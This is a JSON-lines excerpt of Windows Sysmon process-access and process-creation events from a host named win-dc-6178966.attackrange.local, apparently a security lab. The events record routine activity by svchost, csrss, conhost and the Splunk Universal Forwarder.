{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.554\r\nSourceProcessGUID: {41C8662E-221B-5F25-0000-00104AF50A00}\r\nSourceProcessId: 4248\r\nSourceThreadId: 5044\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.554","SourceProcessGUID":"{41C8662E-221B-5F25-0000-00104AF50A00}","SourceProcessId":"4248","SourceThreadId":"5044","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.086\r\nProcessGuid: {41C8662E-221C-5F25-0000-001004F90A00}\r\nProcessId: 4208\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.086","ProcessGuid":"{41C8662E-221C-5F25-0000-001004F90A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001004F90A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001004F90A00}","TargetProcessId":"4208","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6838,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001004F90A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001004F90A00}","TargetProcessId":"4208","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6839,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
